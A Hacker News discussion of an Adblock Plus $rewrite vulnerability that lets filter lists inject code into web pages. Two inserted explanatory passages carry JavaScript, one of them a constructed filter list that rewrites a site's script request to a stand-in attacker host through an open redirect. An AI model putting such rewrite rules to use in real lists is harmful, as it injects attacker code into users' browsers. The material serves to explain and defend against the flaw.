
Adblock Plus filter lists may execute arbitrary code in web pages - dessant
https://armin.dev/blog/2019/04/adblock-plus-code-injection/
======
k1m
Good advice:

"Users may also switch to uBlock Origin.[1] It does not support the $rewrite
filter option and it is not vulnerable to the described attack."

[1] [https://github.com/gorhill/uBlock](https://github.com/gorhill/uBlock)

~~~
magduf
There have been many good reasons to switch to uBlock Origin _long_ before
today's issue: speed, memory footprint, no "acceptable ads", etc. I don't know
why anyone still uses ABP.

~~~
angott
It's mostly a marketing issue in my opinion. ABP was the first ad-blocker to
enter the mainstream market back during the Firefox days, and they had
virtually no competition for half a decade, before the entire Acceptable Ads
controversy. I think unfortunately there is still a significant number of
users who just associate "AdBlock == AdBlock Plus".

~~~
gorhill
> a significant number of users who just associate "AdBlock == AdBlock Plus"

AdBlock uses Adblock Plus filtering engine internally and also supports and
enables "Acceptable Ads" by default:

> AdBlock is a popular ad blocking extension for Chrome, Opera and Safari, now
> based on the Adblock Plus code.[1]

* * *

[1] [https://github.com/betafish-inc/adblock-releases](https://github.com/betafish-inc/adblock-releases)

~~~
angott
Oh, sorry, I was not referring to specifically that AdBlock extension. I
wanted to say that users just associate "adblocking extension = AdBlock Plus".

~~~
gorhill
Ah I see, never mind then; and in that case I do agree with your comment.

~~~
shpx
Any chance you're going to get the uBlock name back? Explaining the story
every time I tell someone to switch to uBlock _Origin_ is annoying.

------
gorhill
> Users may also switch to uBlock Origin. It does not support the $rewrite
> filter option

Support for this filter option was discussed (and declined) in uBlock Origin's
issue tracker: [https://github.com/uBlockOrigin/uBlock-issues/issues/46](https://github.com/uBlockOrigin/uBlock-issues/issues/46)

~~~
joncrane
Damn, the developer of uBlock Origin recognized the problem with it
immediately, explained it, and shut it down.

~~~
shawnz
He is also the person who posted the parent comment :)

------
SquareWheel
It's a bit disingenuous to refer to this as an "exploit" all throughout the
article. It's a feature, and an intended one at that. It's offering whitelist
maintainers more power over their filters. You can disagree with its inclusion
in the spec (as I do), but you should make an argument on that premise
instead.

Calling it an exploit is no different than claiming .exe files are exploits
because they allow arbitrary code to run. Or that browser extensions are
exploits because they too can manipulate the page.

~~~
nneonneo
It’s rightly referred to as a vulnerability; the term exploit is used to
describe a realistic scenario that is enabled by the vulnerable code.

The problem is that you can’t necessarily trust filter maintainers to be
completely honest. Users don’t regularly audit the thousands of rules in their
filter lists, so a bad or compromised filter could easily introduce a
malicious filter in an update. The $rewrite rule lets a filter change what
code is being loaded by a webpage (under certain fairly realistic situations).
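
The mechanism nneonneo describes, as an added example that is not code from Adblock Plus or from the linked article: a toy filter-list engine that models the $rewrite option as a regular-expression filter plus a replacement template in which $1, $2, ... refer to capture groups (String.prototype.replace semantics). The filter lines and URLs are constructed; the same-origin guard is an assumption about what a cautious implementation would check, and the point is that such a guard is not enough once the site's own origin exposes an open redirect, since the rewritten request still passes the check and is then bounced to attacker-controlled content.

```javascript
// Added example, not code from Adblock Plus or the linked article. Models the
// $rewrite option as "/regex/$rewrite=template" with $1, $2, ... capture-group
// substitution. Filter lines, hosts and URLs below are constructed; the
// same-origin guard is an assumption about what a careful engine would check.

// Parse one filter line of the form /regex/$rewrite=template; other syntax is ignored.
function parseRewriteFilter(line) {
  const m = /^\/(.+)\/\$rewrite=(.+)$/.exec(line.trim());
  return m ? { pattern: new RegExp(m[1]), template: m[2] } : null;
}

// Apply the first matching rewrite filter; the request URL is returned
// unchanged when nothing matches.
function applyRewrite(filters, url) {
  for (const f of filters) {
    if (f.pattern.test(url)) return url.replace(f.pattern, f.template);
  }
  return url;
}

// Same-origin guard: refuse any rewrite that moves the request to another origin.
function rewriteSameOriginOnly(filters, url) {
  const target = applyRewrite(filters, url);
  return new URL(target).origin === new URL(url).origin ? target : url;
}

// Constructed filter list as it might arrive in a list update: an ordinary rule
// that neutralises an ad script, a rule that tries to send a request cross-origin
// (the guard stops this one), and a rule that points the site's own script
// request at a hypothetical open redirect on the same host, which the guard
// lets through even though the redirect lands on attacker-controlled content.
const FILTER_LIST = [
  '/^https:\\/\\/ads\\.example\\.net\\/.*$/$rewrite=https://ads.example.net/blank.gif',
  '/^https:\\/\\/cdn\\.example\\.org\\/lib\\.js$/$rewrite=https://evil.example/lib.js',
  '/^(https:\\/\\/www\\.example\\.com)\\/static\\/(app\\.js)$/$rewrite=$1/redirect?to=https://evil.example/$2',
].map(parseRewriteFilter).filter(Boolean);

// Audit helper for reviewing a list before trusting it: flag any rewrite target
// whose query string carries a full URL, a cheap signal that a redirect is
// being chained behind the same-origin check.
function looksLikeRedirectChain(url) {
  const u = new URL(url);
  for (const v of u.searchParams.values()) {
    if (/^https?:\/\//i.test(v)) return true;
  }
  return false;
}
```

Running `rewriteSameOriginOnly(FILTER_LIST, 'https://www.example.com/static/app.js')` yields `https://www.example.com/redirect?to=https://evil.example/app.js`: same origin, so accepted, which is exactly the gap a list author can exploit. `looksLikeRedirectChain` catches this particular pattern but not an origin that simply hosts arbitrary user uploads, so it is a review aid, not a fix.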

~~~
SquareWheel
>The problem is that you can’t necessarily trust filter maintainers to be
completely honest.

I agree with that, and it's not a strong security model. But my original point
is that the author is using a bad faith argument by describing a feature they
dislike as an exploit. It's in spec for what the original authors intended.
Just like running an executable program is potentially risky, but a design of
the system.

~~~
williamscales
> the author is using a bad faith argument by describing a feature they
> dislike as an exploit

I read the article and perhaps it's been edited since you commented, but the
author states in the introduction that there is a security vulnerability in a
feature and provides an exploit. That to me is quite different from calling
the feature itself an exploit.

> It's in spec for what the original authors intended. Just like running an
> executable program is potentially risky, but a design of the system.

While it's true that it is in spec, I see a big difference in terms of how
users experience this situation compared to running an executable program. I
see this as more analogous to a new feature introduced in an executable format
that offers a different security guarantee to what users are already
comfortable with. I don't see pointing this out as being in bad faith.

~~~
SquareWheel
I don't believe it's been edited (or I haven't noticed such an edit). However
on a subsequent re-read, I can see the author's usage of the term "exploit" is
more specific to his example below (the Google Maps attack demo).

While I'd still argue it's "working as intended" (for better or worse), he is
at least calling this specific demonstration an exploit rather than the
feature as a whole. So I'll step back from that position, at least part way.

Thank you for the clarification on that point.

------
userbinator
I feel like this is another instance of "useful feature gets removed because
of security vulturism[1]" --- something which has been happening for a while,
but has gotten infuriatingly frequent lately. In this case, the mere fact that
you're using a third-party list already suggests trust of the author, or at
least an implicit acknowledgement that your ideas of what should be filtered
agree.

 _Ad blocking extensions should consider dropping support for the $rewrite
filter option. It’s always possible to abuse the feature to some degree, even
if only images or style sheets are allowed to be redirected._

The classic "ban it because it can be abused" mindset. Let's ban the use of
computers too, certainly that would be more secure!

 _Google has been notified about the exploit, but the report was closed as
“Intended Behavior”, since they consider the potential security issue to be
present solely in the mentioned browser extensions._

As they should, because what user-agents are doing has nothing whatsoever to
do with their site.

(Disclaimer: I don't use ABP nor uBlock nor any in-browser blocking
extensions, so I have no conflicts of interest here. I use a full MITM proxy
which is far more powerful than anything you can do with a browser extension.
I wonder what he'll think about that...)

[1] [https://news.ycombinator.com/item?id=19660677](https://news.ycombinator.com/item?id=19660677)

~~~
Forge36
It could have been implemented in a more restrictive way to prevent this issue
and allow more targeted behaviors, instead it allows third party lists (which
already require a users trust) to run code. Previously this wasn't the case.

Can your MITM proxy modify HTTPS traffic? If so, how did you configure your
machines to trust the cert you're using?

~~~
userbinator
_Can your MITM proxy modify HTTPS traffic? If so, how did you configure your
machines to trust the cert you're using?_

Yes, of course. It wouldn't be very useful otherwise. The proxy has its own
CA, and I install the cert into the trusted roots of all the machines I use.

------
Animats
Making ad block filter lists Turing-complete: really bad idea.

------
d0bby
People are talking about uBlock Origin...

I really like it, no doubts it's good and everyone should consider using it.

BUT, since we are talking about uBlock Origin, I'd like to mention another
awesome extension Raymond Hill made.

uMatrix
([https://github.com/gorhill/uMatrix](https://github.com/gorhill/uMatrix))

uMatrix alone is very powerful, and will prevent most ads.

Yes you as a user need to do the work, but the result is better.

If you like the idea of uMatrix, you may also look at NoScript!

Actually, I live almost ad free using NoScript + uBlock Origin for at least 2
yrs.

$rewrite... what a dumb feature btw!

~~~
darkpuma
I find uMatrix+uBO (with uMatrix set to block everything by default and uBlock
Origin set to its default easy mode) to be the best setup. Ads virtually never
get through, and most websites don't need javascript at all to read the
articles so my uMatrix whitelist is actually surprisingly small.

------
Y_Y
Well the solution is easy: we just see which of the filterlist publishers are
trustworthy and which aren't, and have the extension automatically download
this listlist and apply it to its list of filterlists. Of course you need to
be sure that the listlist is of trustworthy origin, but you can just check if
the supplier of the listlist is itself on the listlist.

------
ycombonator
More reasons to run Pi-hole, the setup just took 20 mins including installing
Raspbian. Anyone know how to mimic uBlock Origin's filter list in Pi-hole?

~~~
steve19
uBlock can block page elements while Pi-hole can only block DNS. So if the ad
is served from the same domain as the site you are visiting, Pi-hole cannot do
anything about it, but uBlock can.

------
nitrohorse
Some discussion by gorhill 11 months ago about this:
[https://github.com/uBlockOrigin/uBlock-issues/issues/46#issuecomment-391303700](https://github.com/uBlockOrigin/uBlock-issues/issues/46#issuecomment-391303700)

------
deevolution
Switch to brave!

------
OrgNet
one more reason not to use it... too bad the people using it won't ever read
that (they should have switched years ago, so we know they don't read this
kind of news)

------
burtonator
I wonder if we need a non-Turing-complete library for Chrome extensions like
we have for some packet filtering libraries and bitcoin script.

No regex.

No loops.

Constrained list of functions.

This could go a long way towards opening up the web to more extensions but
also keeping it more secure.

I recently did a rev to the Polar chrome extension:

[https://chrome.google.com/webstore/detail/polar-pdf-web-and-documen/jkfdkjomocoaljglgddnmhcbolldcafd?hl=en](https://chrome.google.com/webstore/detail/polar-pdf-web-and-documen/jkfdkjomocoaljglgddnmhcbolldcafd?hl=en)

and I had to request a new permission for filtering and they're now taking a
WEEK to approve any updates due to code review.

I really only need to evaluate a URL and add headers.

This doesn't need to be turing complete.

I basically just need to take an HTTP response and add headers if they're
missing when a specific origin is set.
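
A sketch of the "no regex, no loops, constrained list of functions" idea above, as an added example that is not code from the Polar extension or from any shipped content-blocking API: rules are plain data with a fixed matcher vocabulary (exact host, host suffix, path prefix, resource type) and exactly two actions, block and add-missing-headers. The evaluator rejects any rule outside that vocabulary, so a list update cannot introduce behaviour the engine was never built to run. The rule set, hosts and requests are constructed for the example.

```javascript
// Added example, not code from any real extension or browser API. A declarative
// request-rule evaluator: rules are data, matching is plain string comparison,
// and the only actions are "block" and "addHeaders". Everything below
// (rule set, hosts, requests) is constructed for illustration.

const MATCH_KEYS = new Set(['host', 'hostSuffix', 'pathPrefix', 'resourceType']);
const ACTION_TYPES = new Set(['block', 'addHeaders']);

// Refuse anything outside the fixed vocabulary: unknown matchers, unknown
// actions, non-string values, and header values that could split a response.
function validateRule(rule) {
  for (const k of Object.keys(rule.match || {})) {
    if (!MATCH_KEYS.has(k)) throw new Error(`unknown matcher: ${k}`);
    if (typeof rule.match[k] !== 'string') throw new Error(`matcher ${k} must be a string`);
  }
  if (!rule.action || !ACTION_TYPES.has(rule.action.type)) {
    throw new Error(`unknown action: ${rule.action && rule.action.type}`);
  }
  if (rule.action.type === 'addHeaders') {
    for (const [name, value] of Object.entries(rule.action.headers || {})) {
      const raw = name + value;
      if (typeof value !== 'string' || raw.includes('\r') || raw.includes('\n')) {
        throw new Error(`bad header ${name}`);
      }
    }
  }
  return true;
}

// Plain comparisons only: a rule cannot express a regex or a loop.
function matches(match, req) {
  const u = new URL(req.url);
  if (match.host !== undefined && u.hostname !== match.host) return false;
  if (match.hostSuffix !== undefined &&
      !(u.hostname === match.hostSuffix || u.hostname.endsWith('.' + match.hostSuffix))) return false;
  if (match.pathPrefix !== undefined && !u.pathname.startsWith(match.pathPrefix)) return false;
  if (match.resourceType !== undefined && req.type !== match.resourceType) return false;
  return true;
}

// Evaluate a rule set against one request. A block ends evaluation; headers are
// added only when the response does not already carry them (case-insensitive).
function evaluate(rules, req) {
  const headers = { ...(req.responseHeaders || {}) };
  let blocked = false;
  for (const rule of rules) {
    validateRule(rule);
    if (!matches(rule.match || {}, req)) continue;
    if (rule.action.type === 'block') { blocked = true; break; }
    for (const [name, value] of Object.entries(rule.action.headers || {})) {
      const key = name.toLowerCase();
      if (!Object.keys(headers).some((h) => h.toLowerCase() === key)) headers[name] = value;
    }
  }
  return { blocked, headers };
}

// Constructed rule set: block an ad host and its subdomains; add a missing CORS
// header on one API path so a (hypothetical) web app can read the response.
const RULES = [
  { match: { hostSuffix: 'ads.example.net' }, action: { type: 'block' } },
  { match: { host: 'api.example.com', pathPrefix: '/v1/' },
    action: { type: 'addHeaders', headers: { 'Access-Control-Allow-Origin': 'https://app.example.com' } } },
];
```

Because the rule language has no escape hatch, the worst a hostile list update can do here is block the wrong things or add a header, and `validateRule` turns a malformed or over-reaching rule into a hard error rather than a silent no-op. That bounded blast radius is the property a reviewer can check once for the engine instead of once per list update.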

~~~
tekstar
This is where Safari content blocking extensions are now. The extensions
register a list of URLs with Safari with instructions to block.

